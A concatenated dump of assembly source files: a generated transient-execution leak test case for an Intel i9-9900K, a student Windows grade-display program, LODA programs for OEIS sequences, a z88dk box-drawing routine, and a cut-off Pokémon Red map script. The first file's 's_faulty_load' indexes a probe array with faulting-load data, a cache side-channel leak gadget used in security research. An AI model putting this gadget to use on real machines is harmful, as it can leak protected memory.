Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_21829_582.asm

ljhsiun2/medusa

67d769b8a2fb42c538f10287abaf0e6dbb463f0c

[ "MIT" ]

9

2020-08-13T19:41:58.000Z

2022-03-30T12:22:51.000Z

Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_21829_582.asm

ljhsiun2/medusa

67d769b8a2fb42c538f10287abaf0e6dbb463f0c

[ "MIT" ]

1

2021-04-29T06:29:35.000Z

2021-05-13T21:02:30.000Z

Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_21829_582.asm

ljhsiun2/medusa

67d769b8a2fb42c538f10287abaf0e6dbb463f0c

[ "MIT" ]

3

2020-07-14T17:07:07.000Z

2022-03-21T01:12:22.000Z

.global s_prepare_buffers s_prepare_buffers: push %r10 push %r11 push %r14 push %r8 push %rbp push %rcx push %rdi push %rdx push %rsi lea addresses_normal_ht+0x16a62, %r14 nop nop nop nop nop inc %r11 mov (%r14), %ebp nop nop nop nop cmp $9850, %r8 lea addresses_A_ht+0xd562, %rsi nop xor $56875, %r10 movw $0x6162, (%rsi) nop nop nop sub $27760, %rbp lea addresses_A_ht+0x6dd2, %rsi lea addresses_A_ht+0x3d62, %rdi nop nop nop nop sub %r14, %r14 mov $34, %rcx rep movsw nop and %rcx, %rcx lea addresses_A_ht+0x1962, %r10 clflush (%r10) nop inc %rsi and $0xffffffffffffffc0, %r10 movaps (%r10), %xmm6 vpextrq $0, %xmm6, %r8 nop nop nop inc %rsi lea addresses_UC_ht+0x12562, %rsi lea addresses_D_ht+0x165ba, %rdi nop nop inc %rdx mov $1, %rcx rep movsl xor $52699, %r10 lea addresses_normal_ht+0x11662, %rsi lea addresses_WC_ht+0x1b962, %rdi nop nop nop nop inc %r8 mov $69, %rcx rep movsl nop nop nop cmp $30683, %rsi lea addresses_WC_ht+0xc162, %rsi lea addresses_WT_ht+0x5a52, %rdi clflush (%rdi) nop nop and %rbp, %rbp mov $31, %rcx rep movsq nop nop nop xor %r11, %r11 lea addresses_normal_ht+0xa962, %rsi lea addresses_normal_ht+0x5962, %rdi nop nop nop nop add $19459, %r11 mov $64, %rcx rep movsb nop nop nop nop inc %rdi pop %rsi pop %rdx pop %rdi pop %rcx pop %rbp pop %r8 pop %r14 pop %r11 pop %r10 ret .global s_faulty_load s_faulty_load: push %r11 push %r9 push %rax push %rbp push %rdx // Faulty Load lea addresses_D+0x1162, %rax nop inc %rbp mov (%rax), %edx lea oracles, %r11 and $0xff, %rdx shlq $12, %rdx mov (%r11,%rdx,1), %rdx pop %rdx pop %rbp pop %rax pop %r9 pop %r11 ret /* <gen_faulty_load> [REF] {'src': {'type': 'addresses_D', 'AVXalign': True, 'size': 8, 'NT': False, 'same': False, 'congruent': 0}, 'OP': 'LOAD'} [Faulty Load] {'src': {'type': 'addresses_D', 'AVXalign': False, 'size': 4, 'NT': False, 'same': True, 'congruent': 0}, 'OP': 'LOAD'} <gen_prepare_buffer> {'src': {'type': 'addresses_normal_ht', 'AVXalign': False, 'size': 4, 'NT': False, 'same': True, 'congruent': 8}, 'OP': 'LOAD'} {'OP': 'STOR', 'dst': {'type': 'addresses_A_ht', 'AVXalign': False, 'size': 2, 'NT': False, 'same': False, 'congruent': 9}} {'src': {'type': 'addresses_A_ht', 'congruent': 4, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_A_ht', 'congruent': 9, 'same': False}} {'src': {'type': 'addresses_A_ht', 'AVXalign': True, 'size': 16, 'NT': False, 'same': False, 'congruent': 10}, 'OP': 'LOAD'} {'src': {'type': 'addresses_UC_ht', 'congruent': 5, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_D_ht', 'congruent': 3, 'same': False}} {'src': {'type': 'addresses_normal_ht', 'congruent': 8, 'same': True}, 'OP': 'REPM', 'dst': {'type': 'addresses_WC_ht', 'congruent': 11, 'same': False}} {'src': {'type': 'addresses_WC_ht', 'congruent': 11, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_WT_ht', 'congruent': 4, 'same': False}} {'src': {'type': 'addresses_normal_ht', 'congruent': 10, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_normal_ht', 'congruent': 8, 'same': False}} {'36': 21829} 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 */

39.051613

2,999

0.663142

74a4aa3b94f5f92df8279b277ac041e01f2d79dc

6,303

asm

Assembly

3-Assemble(80x86)/lab-5/demo.asm

ftxj/4th-Semester

1d5c7e7e028176524bdafc64078775d42b73b51c

[ "MIT" ]

null

3-Assemble(80x86)/lab-5/demo.asm

ftxj/4th-Semester

1d5c7e7e028176524bdafc64078775d42b73b51c

[ "MIT" ]

null

3-Assemble(80x86)/lab-5/demo.asm

ftxj/4th-Semester

1d5c7e7e028176524bdafc64078775d42b73b51c

[ "MIT" ]

null

.386 .model flat,stdcall option casemap:none WinMain proto :DWORD,:DWORD,:DWORD,:DWORD WndProc proto :DWORD,:DWORD,:DWORD,:DWORD Paint_Proc PROTO :DWORD, hDC:DWORD Display proto :DWORD include menuID.INC include windows.inc include user32.inc include kernel32.inc include gdi32.inc include shell32.inc includelib user32.lib includelib kernel32.lib includelib gdi32.lib includelib shell32.lib return MACRO arg mov eax, arg ret ENDM student struct myname db 10 dup(0) chinese db 0 math db 0 english db 0 average db 0 grade db 0 student ends .data ClassName db 'TryWinClass',0 AppName db 'Our First Window',0 MenuName db 'MyMenu',0 DlgName db 'MyDialog',0 AboutMsg db 'I am ACM1501 Xin Jie',0 hInstance dd 0 CommandLine dd 0 buf student <> student <'Jin',96,98,100,0,'A'> student <'Xin',90,90,90,0,'A'> msg_name db 'name',0 msg_chinese db 'chinese',0 msg_math db 'math',0 msg_english db 'english',0 msg_average db 'average',0 msg_grade db 'grade',0 msg_frame db 100 dup ('_') chinese db 3,0,'___','() ','** ' math db 3,0,'99 ','100','89 ' english db 3,0,'99 ','100','90 ' average db 3,0,' ',' ',' ' .code Start: invoke GetModuleHandle,NULL ; 参数为 0(NULL) 表明获得此程序句柄 mov hInstance,eax invoke GetCommandLine mov CommandLine,eax invoke WinMain,hInstance,NULL,CommandLine,SW_SHOWDEFAULT invoke ExitProcess,eax ;; WinMain proc hInst:DWORD,hPrevInst:DWORD,CmdLine:DWORD,CmdShow:DWORD LOCAL wc:WNDCLASSEX ;变量名：类型 LOCAL msg:MSG LOCAL hWnd:HWND local mywidth:DWORD local myheight:DWORD invoke RtlZeroMemory,addr wc,sizeof wc mov wc.cbSize,SIZEOF WNDCLASSEX ;这个结构体大小 mov wc.style, CS_HREDRAW or CS_VREDRAW ;窗口风格 mov wc.lpfnWndProc, offset WndProc ;窗口消息处理的指针 mov wc.cbClsExtra,NULL ; mov wc.cbWndExtra,NULL push hInst pop wc.hInstance ;处理的窗口的句柄 mov wc.hbrBackground,COLOR_WINDOW+1 ;背景色 mov wc.lpszMenuName, offset MenuName ;资源文件中描述菜单的资源文件名字符串的指针 mov wc.lpszClassName,offset ClassName ; 指向类名称的指针 invoke LoadIcon,NULL,IDI_APPLICATION mov wc.hIcon,eax; hIcon 窗口图标资源 mov wc.hIconSm,0 invoke LoadCursor,NULL,IDC_ARROW mov wc.hCursor,eax ; hCursor 光标资源 invoke RegisterClassEx, addr wc ;注册窗口 mov myheight, 500 mov mywidth, 800 INVOKE CreateWindowEx,NULL,addr ClassName,addr AppName,\ WS_OVERLAPPEDWINDOW,CW_USEDEFAULT,\ CW_USEDEFAULT,mywidth,myheight,NULL,NULL,\ hInst,NULL ;创建窗口 mov hWnd,eax ;执行成功返回窗口句柄 INVOKE ShowWindow,hWnd,SW_SHOWNORMAL INVOKE UpdateWindow,hWnd ;; MsgLoop: INVOKE GetMessage,addr msg,NULL,0,0 ;msg, 句柄,消息范围 cmp EAX,0 ; 0 是返回的退出消息 je ExitLoop INVOKE TranslateMessage,addr msg ;将键盘输入转化为对应ACSCII码 INVOKE DispatchMessage,addr msg ; 转移到窗口消息处理的指针所在函数 jmp MsgLoop ExitLoop: mov eax,msg.wParam ret WinMain endp WndProc proc hWnd:DWORD,uMsg:DWORD,wParam:DWORD,lParam:DWORD LOCAL hdc:DWORD LOCAL Ps :PAINTSTRUCT .IF uMsg == WM_DESTROY invoke PostQuitMessage,NULL .ELSEIF uMsg == WM_KEYDOWN .IF wParam == VK_F1 ;;your code .ENDIF .ELSEIF uMsg == WM_COMMAND .IF wParam == IDM_FILE_EXIT invoke SendMessage,hWnd,WM_CLOSE,0,0 ;接受消息的窗口，要发送的消息，消息类别，消息类别 .ELSEIF wParam == IDM_ACTION_AVERAGE call SET_AVERANGE_GRADE .ELSEIF wParam == IDM_ACTION_LIST invoke Display,hWnd .ELSEIF wParam == IDM_HELP_ABOUT invoke MessageBoxA,hWnd,addr AboutMsg,addr AppName,0 ;所属窗口，显示消息，标题，类型 .ENDIF .ELSEIF uMsg == WM_PAINT invoke BeginPaint,hWnd,ADDR Ps mov hdc, eax ;invoke Paint_Proc,hWnd,hdc invoke EndPaint,hWnd,ADDR Ps return 0 ;;redraw window again .ELSE invoke DefWindowProc,hWnd,uMsg,wParam,lParam ret .ENDIF xor eax,eax ret WndProc endp SET_AVERANGE_GRADE: PUSH ESI PUSH EAX PUSH EBX PUSH ECX PUSH EDX MOV SI, 0 MOV CX, 5 MATH: MOV AX, 0 MOV BX, 0 MOV DX, 0 MOV AL, buf[15].chinese MOV AH, 2 MUL AH ;AX IS CHINESE * 2 <= 200 16 IS ENOUGH MOV BL, buf[15].math;MATH GRADE MOV BH, 0 ADD BX, AX MOV AL, buf[15].english ;ENGLISH MOV AH, 0 MOV DL, 2 DIV DL ADD BX, AX MOV AX, 2 MUL BX MOV BL, 7 DIV BL MOV buf[15].average, AL ADD SI, 15 LOOP MATH POP EDX POP ECX POP EBX POP EAX POP ESI RET Display proc hWnd:DWORD XX equ 10 YY equ 10 N EQU 0 XX_GAP equ 100 YY_GAP equ 30 CAL MACRO A,B invoke TextOut,hdc,XX+0*XX_GAP,YY+&A&*YY_GAP,offset buf[&B&*15].myname,3 invoke TextOut,hdc,XX+1*XX_GAP,YY+&A&*YY_GAP,offset chinese+2+&B&*3,chinese invoke TextOut,hdc,XX+2*XX_GAP,YY+&A&*YY_GAP,offset math+2+&B&*3, math invoke TextOut,hdc,XX+3*XX_GAP,YY+&A&*YY_GAP,offset english+2+&B&*3,english invoke TextOut,hdc,XX+4*XX_GAP,YY+&A&*YY_GAP,offset average+2+&B&*3,average invoke TextOut,hdc,XX+5*XX_GAP,YY+&A&*YY_GAP,offset buf[&B&*15].grade,1 ENDM LOCAL hdc:HDC invoke GetDC,hWnd mov hdc,eax invoke TextOut,hdc,XX+0*XX_GAP,YY+0*YY_GAP,offset msg_name,4 invoke TextOut,hdc,XX+1*XX_GAP,YY+0*YY_GAP,offset msg_chinese,7 invoke TextOut,hdc,XX+2*XX_GAP,YY+0*YY_GAP,offset msg_math,4 invoke TextOut,hdc,XX+3*XX_GAP,YY+0*YY_GAP,offset msg_english,7 invoke TextOut,hdc,XX+4*XX_GAP,YY+0*YY_GAP,offset msg_average,7 invoke TextOut,hdc,XX+5*XX_GAP,YY+0*YY_GAP,offset msg_grade,5 ;; invoke TextOut,hdc,XX+0*XX_GAP,YY+1*YY_GAP,offset msg_frame,67 ;; CAL 2,0 CAL 3,1 CAL 4,2 ret Display endp end Start

28.138393

79

0.608916

2d88073d8118a20c0df028a6a07889ed284f0dc6

596

asm

Assembly

oeis/023/A023607.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

11

2021-08-22T19:44:55.000Z

2022-03-20T16:47:57.000Z

oeis/023/A023607.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

9

2021-08-29T13:15:54.000Z

2022-03-09T19:52:31.000Z

oeis/023/A023607.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

3

2021-08-22T20:56:47.000Z

2021-09-29T06:26:12.000Z

; A023607: a(n) = n * Fibonacci(n+1). ; 0,1,4,9,20,40,78,147,272,495,890,1584,2796,4901,8540,14805,25552,43928,75258,128535,218920,371931,630454,1066464,1800600,3034825,5106868,8580897,14398412,24129160,40388070,67527579,112786496,188195271,313733810,522562320,869681412,1446262253,2403347468,3991032045,6623205640,10984486136,18206766354,30160575519,49935739480,82634035635,136675893358,225953767872,373379618352,616727182225,1018250553700,1680515285049,2772447140996,4572181277416,7537528572030,12421828854435,20464376585072 mov $1,$0 lpb $1 sub $1,1 mov $2,$3 mov $3,$0 add $0,$2 lpe

54.181818

488

0.810403

bf30f0552e7d3c7c9a053f5c2912f685271bd570

405

asm

Assembly

programs/oeis/054/A054725.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

22

2018-02-06T19:19:31.000Z

2022-01-17T21:53:31.000Z

programs/oeis/054/A054725.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

41

2021-02-22T19:00:34.000Z

2021-08-28T10:47:47.000Z

programs/oeis/054/A054725.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

5

2021-02-24T21:14:16.000Z

2021-08-09T19:48:05.000Z

; A054725: a(1)=1; a(n)= sum(p \ n, a(p-1)), where sum is over all primes p that divide n, with multiplicity. ; 1,1,1,2,2,2,2,3,2,3,3,3,3,3,3,4,4,3,3,4,3,4,4,4,4,4,3,4,4,4,4,5,4,5,4,4,4,4,4,5,5,4,4,5,4,5,5,5,4,5,5,5,5,4,5,5,4,5,5,5,5,5,4,6,5,5,5,6,5,5,5,5,5,5,5,5,5,5,5,6,4,6,6,5,6,5,5,6,6,5,5,6,5,6,5,6,6,5,5,6 mul $0,2 seq $0,32358 ; Number of iterations of phi(n) needed to reach 2. trn $0,1 add $0,1

50.625

201

0.575309

65f5531d958a53734b5c3968922dda6d3d745fcc

335

asm

Assembly

programs/oeis/080/A080586.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

22

2018-02-06T19:19:31.000Z

2022-01-17T21:53:31.000Z

programs/oeis/080/A080586.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

41

2021-02-22T19:00:34.000Z

2021-08-28T10:47:47.000Z

programs/oeis/080/A080586.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

5

2021-02-24T21:14:16.000Z

2021-08-09T19:48:05.000Z

; A080586: A run of 3*2^n 1's followed by a run of 3*2^n 2's, for n=0, 1, 2, ... ; 1,1,1,2,2,2,1,1,1,1,1,1,2,2,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1,1,1,1,1,1,1 div $0,3 lpb $0 div $0,2 sub $0,1 lpe add $0,1

33.5

201

0.516418

7339599c6dab8b6077fcd1e8b358274f3aee3249

336

asm

Assembly

programs/oeis/047/A047545.asm

karttu/loda

9c3b0fc57b810302220c044a9d17db733c76a598

[ "Apache-2.0" ]

1

2021-03-15T11:38:20.000Z

programs/oeis/047/A047545.asm

karttu/loda

9c3b0fc57b810302220c044a9d17db733c76a598

[ "Apache-2.0" ]

null

programs/oeis/047/A047545.asm

karttu/loda

9c3b0fc57b810302220c044a9d17db733c76a598

[ "Apache-2.0" ]

null

; A047545: Numbers that are congruent to {0, 1, 3, 4, 7} mod 8. ; 0,1,3,4,7,8,9,11,12,15,16,17,19,20,23,24,25,27,28,31,32,33,35,36,39,40,41,43,44,47,48,49,51,52,55,56,57,59,60,63,64,65,67,68,71,72,73,75,76,79,80,81,83,84,87,88,89,91,92,95,96,97,99,100,103,104 mov $2,$0 add $0,1 mul $0,2 mov $1,$0 div $1,5 mul $1,6 div $1,4 add $1,$2

28

195

0.622024

1a2a66a3b10295060fc6734665f4d6d3eda0a667

1,194

asm

Assembly

libsrc/graphics/w_drawb.asm

Toysoft/z88dk

f930bef9ac4feeec91a07303b79ddd9071131a24

[ "ClArtistic" ]

8

2017-01-18T12:02:17.000Z

2021-06-12T09:40:28.000Z

libsrc/graphics/w_drawb.asm

Toysoft/z88dk

f930bef9ac4feeec91a07303b79ddd9071131a24

[ "ClArtistic" ]

1

2017-03-06T07:41:56.000Z

libsrc/graphics/w_drawb.asm

Toysoft/z88dk

f930bef9ac4feeec91a07303b79ddd9071131a24

[ "ClArtistic" ]

3

2017-03-07T03:19:40.000Z

2021-09-15T17:59:19.000Z

; ; Drawbox ; ; Generic high resolution version ; ; ; $Id: w_drawb.asm,v 1.2 2016-10-18 06:52:34 stefano Exp $ ; INCLUDE "graphics/grafix.inc" SECTION code_clib PUBLIC drawb PUBLIC _drawb EXTERN w_plotpixel EXTERN w_line_r EXTERN swapgfxbk EXTERN swapgfxbk1 EXTERN __graphics_end .drawb ._drawb push ix ld ix,4 add ix,sp ld l,(ix+6) ld h,(ix+7) ld e,(ix+4) ld d,(ix+5) push hl push de push ix call swapgfxbk call w_plotpixel call swapgfxbk1 pop ix ld e,(ix+0) ld d,(ix+1) ld hl,0 push ix call swapgfxbk ld ix,w_plotpixel call w_line_r call swapgfxbk1 pop ix ld l,(ix+2) ld h,(ix+3) ld de,0 push ix call swapgfxbk ld ix,w_plotpixel call w_line_r call swapgfxbk1 pop ix pop de pop hl push ix call swapgfxbk call w_plotpixel call swapgfxbk1 pop ix ld l,(ix+2) ld h,(ix+3) ld de,0 push ix call swapgfxbk ld ix,w_plotpixel call w_line_r call swapgfxbk1 pop ix ld e,(ix+0) ld d,(ix+1) ld hl,0 push ix call swapgfxbk ld ix,w_plotpixel call w_line_r jp __graphics_end

12.568421

58

0.607203

9761b81732f4ee89e278c81d86d4900231bbb543

738

asm

Assembly

programs/oeis/165/A165864.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

22

2018-02-06T19:19:31.000Z

2022-01-17T21:53:31.000Z

programs/oeis/165/A165864.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

41

2021-02-22T19:00:34.000Z

2021-08-28T10:47:47.000Z

programs/oeis/165/A165864.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

5

2021-02-24T21:14:16.000Z

2021-08-09T19:48:05.000Z

; A165864: Totally multiplicative sequence with a(p) = 43. ; 1,43,43,1849,43,1849,43,79507,1849,1849,43,79507,43,1849,1849,3418801,43,79507,43,79507,1849,1849,43,3418801,1849,1849,79507,79507,43,79507,43,147008443,1849,1849,1849,3418801,43,1849,1849,3418801,43,79507,43,79507,79507,1849,43,147008443,1849,79507,1849,79507,43,3418801,1849,3418801,1849,1849,43,3418801,43,1849,79507,6321363049,1849,79507,43,79507,1849,79507,43,147008443,43,1849,79507,79507,1849,79507,43,147008443,3418801,1849,43,3418801,1849,1849,1849,3418801,43,3418801,1849,79507,1849,1849,1849,6321363049,43,79507,79507,3418801 seq $0,1222 ; Number of prime divisors of n counted with multiplicity (also called bigomega(n) or Omega(n)). mov $1,43 pow $1,$0 mov $0,$1

92.25

538

0.784553

d0e0bc99f6f94f1ef837cff3c6c4477cffd28464

350

asm

Assembly

programs/oeis/128/A128428.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

22

2018-02-06T19:19:31.000Z

2022-01-17T21:53:31.000Z

programs/oeis/128/A128428.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

41

2021-02-22T19:00:34.000Z

2021-08-28T10:47:47.000Z

programs/oeis/128/A128428.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

5

2021-02-24T21:14:16.000Z

2021-08-09T19:48:05.000Z

; A128428: Number of distinct prime factors of n^2+1. ; 1,1,2,1,2,1,2,2,2,1,2,2,3,1,2,1,3,2,2,1,3,2,3,1,2,1,3,2,2,2,3,2,3,2,2,1,3,2,2,1,2,2,3,2,2,2,4,2,2,2,2,2,3,1,3,1,3,2,2,2,2,2,3,2,2,1,3,2,2,2,2,3,4,1,3,2,3,2,2,2,3,2,4,1,2,2,3,2,3,1,3,2,3,1,2,2,3,3,3,2 add $0,1 pow $0,2 seq $0,1221 ; Number of distinct primes dividing n (also called omega(n)).

50

201

0.585714

a2bcdba100e037dcd618a2d0e849d394f331ce45

536

asm

Assembly

programs/oeis/092/A092387.asm

jmorken/loda

99c09d2641e858b074f6344a352d13bc55601571

[ "Apache-2.0" ]

1

2021-03-15T11:38:20.000Z

programs/oeis/092/A092387.asm

jmorken/loda

99c09d2641e858b074f6344a352d13bc55601571

[ "Apache-2.0" ]

null

programs/oeis/092/A092387.asm

jmorken/loda

99c09d2641e858b074f6344a352d13bc55601571

[ "Apache-2.0" ]

null

; A092387: a(n) = Fibonacci(2*n+1) + Fibonacci(2*n-1) + 2. ; 5,9,20,49,125,324,845,2209,5780,15129,39605,103684,271445,710649,1860500,4870849,12752045,33385284,87403805,228826129,599074580,1568397609,4106118245,10749957124,28143753125,73681302249,192900153620,505019158609,1322157322205,3461452808004,9062201101805,23725150497409,62113250390420,162614600673849,425730551631125,1114577054219524,2918000611027445,7639424778862809 mov $1,3 mov $2,1 lpb $0 mov $3,$2 lpb $0 sub $0,$2 add $3,$1 add $1,$3 lpe lpe add $1,2

35.733333

368

0.768657

bb5270268b755d7ebd18e496c27ff2495fb20e64

390

asm

Assembly

oeis/332/A332195.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

11

2021-08-22T19:44:55.000Z

2022-03-20T16:47:57.000Z

oeis/332/A332195.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

9

2021-08-29T13:15:54.000Z

2022-03-09T19:52:31.000Z

oeis/332/A332195.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

3

2021-08-22T20:56:47.000Z

2021-09-29T06:26:12.000Z

; A332195: a(n) = 10^(2n+1) - 4*10^n - 1. ; 5,959,99599,9995999,999959999,99999599999,9999995999999,999999959999999,99999999599999999,9999999995999999999,999999999959999999999,99999999999599999999999,9999999999995999999999999,999999999999959999999999999,99999999999999599999999999999,9999999999999995999999999999999 seq $0,198971 ; a(n) = 5*10^n - 1. pow $0,2 div $0,45 mul $0,18 add $0,5

43.333333

273

0.805128

265a8310b3e63fbda081083b1a0687ac665d8a13

5,168

asm

Assembly

scripts/Route25.asm

opiter09/ASM-Machina

75d8e457b3e82cc7a99b8e70ada643ab02863ada

[ "CC0-1.0" ]

1

2022-02-15T00:19:44.000Z

scripts/Route25.asm

opiter09/ASM-Machina

75d8e457b3e82cc7a99b8e70ada643ab02863ada

[ "CC0-1.0" ]

null

scripts/Route25.asm

opiter09/ASM-Machina

75d8e457b3e82cc7a99b8e70ada643ab02863ada

[ "CC0-1.0" ]

null

Route25_Script: call Route25Script_515e1 call EnableAutoTextBoxDrawing ld hl, Route25TrainerHeaders ld de, Route25_ScriptPointers ld a, [wRoute25CurScript] call ExecuteCurMapScriptInTable ld [wRoute25CurScript], a ret Route25Script_515e1: ld hl, wCurrentMapScriptFlags bit 6, [hl] res 6, [hl] ret z CheckEventHL EVENT_LEFT_BILLS_HOUSE_AFTER_HELPING ret nz CheckEventReuseHL EVENT_MET_BILL_2 jr nz, .asm_515ff ResetEventReuseHL EVENT_BILL_SAID_USE_CELL_SEPARATOR ld a, HS_BILL_POKEMON ld [wMissableObjectIndex], a predef_jump ShowObject .asm_515ff CheckEventAfterBranchReuseHL EVENT_GOT_SS_TICKET, EVENT_MET_BILL_2 ret z SetEventReuseHL EVENT_LEFT_BILLS_HOUSE_AFTER_HELPING ld a, HS_NUGGET_BRIDGE_GUY ld [wMissableObjectIndex], a predef HideObject ld a, HS_BILL_1 ld [wMissableObjectIndex], a predef HideObject ld a, HS_BILL_2 ld [wMissableObjectIndex], a predef_jump ShowObject Route25_ScriptPointers: dw CheckFightingMapTrainers dw DisplayEnemyTrainerTextAndStartBattle dw EndTrainerBattle Route25_TextPointers: dw Route25Text1 dw Route25Text2 dw Route25Text3 dw Route25Text4 dw Route25Text5 dw Route25Text6 dw Route25Text7 dw Route25Text8 dw Route25Text9 dw PickUpItemText dw Route25Text11 Route25TrainerHeaders: def_trainers Route25TrainerHeader0: trainer EVENT_BEAT_ROUTE_25_TRAINER_0, 2, Route25BattleText1, Route25EndBattleText1, Route25AfterBattleText1 Route25TrainerHeader1: trainer EVENT_BEAT_ROUTE_25_TRAINER_1, 3, Route25BattleText2, Route25EndBattleText2, Route25AfterBattleText2 Route25TrainerHeader2: trainer EVENT_BEAT_ROUTE_25_TRAINER_2, 3, Route25BattleText3, Route25EndBattleText3, Route25AfterBattleText3 Route25TrainerHeader3: trainer EVENT_BEAT_ROUTE_25_TRAINER_3, 2, Route25BattleText4, Route25EndBattleText4, Route25AfterBattleText4 Route25TrainerHeader4: trainer EVENT_BEAT_ROUTE_25_TRAINER_4, 4, Route25BattleText5, Route25EndBattleText5, Route25AfterBattleText5 Route25TrainerHeader5: trainer EVENT_BEAT_ROUTE_25_TRAINER_5, 4, Route25BattleText6, Route25EndBattleText6, Route25AfterBattleText6 Route25TrainerHeader6: trainer 